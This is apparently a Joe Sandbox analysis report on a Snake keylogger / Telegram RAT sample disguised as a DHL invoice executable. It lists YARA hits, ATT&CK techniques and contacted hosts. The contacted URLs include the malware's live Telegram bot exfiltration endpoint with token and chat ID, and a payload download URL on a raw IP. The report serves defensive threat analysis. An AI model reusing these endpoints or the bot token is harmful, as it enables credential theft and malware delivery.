Source: Yara match	File source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2940130567.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2940130567.0000000002659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	211 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	211 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Invoice DHL - AWB 2024 E4001 - 0000731.exe	26%	Virustotal		Browse
Invoice DHL - AWB 2024 E4001 - 0000731.exe	26%	ReversingLabs
Invoice DHL - AWB 2024 E4001 - 0000731.exe	100%	Avira	HEUR/AGEN.1308518
Invoice DHL - AWB 2024 E4001 - 0000731.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287380231&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake	false	high
http://160.22.121.182/STATO/Vskhdvzxu.mp3	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287	InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/mgravell/protobuf-neti	Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/14436606/23354	Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/mgravell/protobuf-netJ	Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/11564914/23354;	Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/2152978/23354	Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000250D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/mgravell/protobuf-net	Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000250D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	InstallUtil.exe, 00000004.00000002.2940130567.0000000002594000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000250D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://160.22.121.182	Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002381000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://checkip.dyndns.com	InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp	false	high
http://160.22.121.182/STATO/Vskhdvzxu.mp310zmhb41piE2K/FJ1XdBqJA==	Invoice DHL - AWB 2024 E4001 - 0000731.exe	false	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002381000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
160.22.121.182	unknown	unknown	45194	SIPL-ASSysconInfowayPvtLtdIN	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578744
Start date and time:	2024-12-20 10:21:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Invoice DHL - AWB 2024 E4001 - 0000731.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@3/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 313 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:22:00	API Interceptor	16x Sleep call for process: Invoice DHL - AWB 2024 E4001 - 0000731.exe modified
04:22:40	API Interceptor	502889x Sleep call for process: InstallUtil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	c9toH15OT0.exe	Get hash	malicious	Unknown	Browse
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer	Browse
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
104.21.67.152	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	Overheaped237.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	0001.exe	Get hash	malicious	Snake Keylogger	Browse
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
132.226.247.73	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	ugpJX5h56S.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	DEC 2024 RFQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Request for quote.doc	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Hesap_Hareketleri_10122024_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	Requested Documentation.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	YU SV Payment.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	Overheaped237.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
reallyfreegeoip.org	YU SV Payment.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	Overheaped237.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
api.telegram.org	c9toH15OT0.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	149.154.167.220
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	149.154.167.220
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	pjthjsdjgjrtavv.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	c9toH15OT0.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	149.154.167.99
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer	Browse	149.154.167.220
	file.exe	Get hash	malicious	ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar	Browse	149.154.167.99
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
CLOUDFLARENETUS	https://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291	Get hash	malicious	Unknown	Browse	172.66.0.227
	wp-s2.exe	Get hash	malicious	Python BackDoor	Browse	104.20.22.46
	https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment	Get hash	malicious	HTMLPhisher	Browse	104.16.123.96
	YU SV Payment.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	wp-s2.exe	Get hash	malicious	Python BackDoor	Browse	104.20.22.46
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	104.21.67.146
	https://u46509964.ct.sendgrid.net/ls/click?upn=u001.16O0hg1-2FLz1kpPxGHUZbqTUnkidniSFIXbuQ0K27NKGR5E4qQP4y3-2BK2LCxUfHTmD8VAoWu9fqrv96heRY-2BDaw-3D-3DTW9l_kcz-2FW2m7wWBC5iX2nmYizXpnEWoSr8Rc5lqOd2Tm8BrX2ha7XCwhAEdfUnTDQdcFlDoClQCenTHrYqYGrvROsmQGK19xExQ3O8UU0JUBZANb3FsycXG0lXfAeU6Ge3kEKNmMydUTpk2mvytxKM8NWM4-2BCe9md9gsZjY-2FmreGd712h4QJlOUlhQy19VQuOzLTR0hg5YGbygTAwGERJ0n3IsJQDuwHOGcAqA18p5ElbhIowXEJo1-2FUNhaAkl3hll56dS6aJMfJ2Cg7jctNhsypZwMqKm18nIQwqxy0HjDjPtDlRcWFBii-2BIabVdhAMwhtvbY-2BhH45kGHgqL1VbALLhTExLjDfFJ4Mdg1hbx5shtVSm69xnT8S0os3NwgUPcP6MZcGvFpVYjCIpNJRmEhnpApXmFzR0GdBotdIKDeKv3ZVh61As-2FSNo3vfT6a-2F1G6CSiTaxzhsqh2H-2BbaxKc9CNbAVT-2BT7dLfv3mwuz99sF3ZWYAQVhK-2FC3sPsTl5X4hdzGiFwatwFf8YUFBISMNX22jwRHFRxLR66dQgVtYo7IumZ-2FOZfPJ2G3u57Las-2FXsx3SO8XE1W1y4QspPQeH1YjVMsZnAeeR8w-2FvWRwY1A7qeifyIBD1fUq-2B4bmZYMnqZ3q5oEXMCBqA-2Fhiv6OawVXsyA5vOFgFJ9F0GjgBX8N-2FlVTcBHanqEGbxSYzxEvDD4r3DBgXj6FxUKNaXGPhd18AzzCXeX88LcJxWAPd-2Fv7JiB88FpQ5kwb7TyWiLLfMzbetfGykMOctbu8W3BbDsIyadCguknOKT9sBLCEKiPAam3h8kh-2BsXXxkR2EvqCeFfErZ3PwKa1SVHAEbQojZZV7jqlLyJR8KYd7Ob5ZMYMENFHn0kgSi7eB-2FawHwHTrEhLDYX-2BOWrkMOQimBc4NTUUy5DbdiVfhlyh7bL6srP-2ByInzpsE8pygdal5s3pCDu8-2F94-2B1f3C1MQ9-2FkWFJVilN3Xiglg-3D-3D	Get hash	malicious	Unknown	Browse	104.18.142.119
	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	pjthjsdjgjrtavv.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	Captcha.hta	Get hash	malicious	LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	172.67.197.170
SIPL-ASSysconInfowayPvtLtdIN	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	160.21.29.33
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	160.22.199.61
	jew.mpsl.elf	Get hash	malicious	Unknown	Browse	183.87.70.106
	i486.elf	Get hash	malicious	Mirai	Browse	160.22.118.22
	jew.x86.elf	Get hash	malicious	Unknown	Browse	27.107.87.108
	hax.ppc.elf	Get hash	malicious	Mirai	Browse	45.117.212.57
	jew.arm.elf	Get hash	malicious	Unknown	Browse	160.22.254.126
	sora.ppc.elf	Get hash	malicious	Mirai	Browse	183.87.70.111
	jew.m68k.elf	Get hash	malicious	Unknown	Browse	160.21.176.232
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	27.107.187.178
UTMEMUS	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
